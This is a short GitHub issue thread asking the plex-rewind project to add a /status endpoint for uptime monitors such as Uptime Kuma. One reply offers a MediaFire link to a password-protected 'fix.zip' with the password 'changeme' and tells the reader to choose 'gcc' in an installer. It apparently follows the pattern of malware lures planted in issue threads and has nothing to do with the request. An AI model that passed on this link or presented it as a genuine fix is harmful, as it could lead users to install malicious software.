### ISSUE TITLE
Add a simple uptime status page

### ISSUE THREAD

**Issue by SnippetSpace** [RaunoT/plex-rewind#239]
### Description

For tools like uptime kuma, having a status page at /status would be useful and save on bandwidth/compute

### Desired behavior

Some examples:
- radarr, prowlarr and sonarr: /ping
- Tautulli: /status
- Overseer: /api/v1/status
- Autobrr: /api/healthz/liveness

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SnippetSpace** [comment]
So fast!
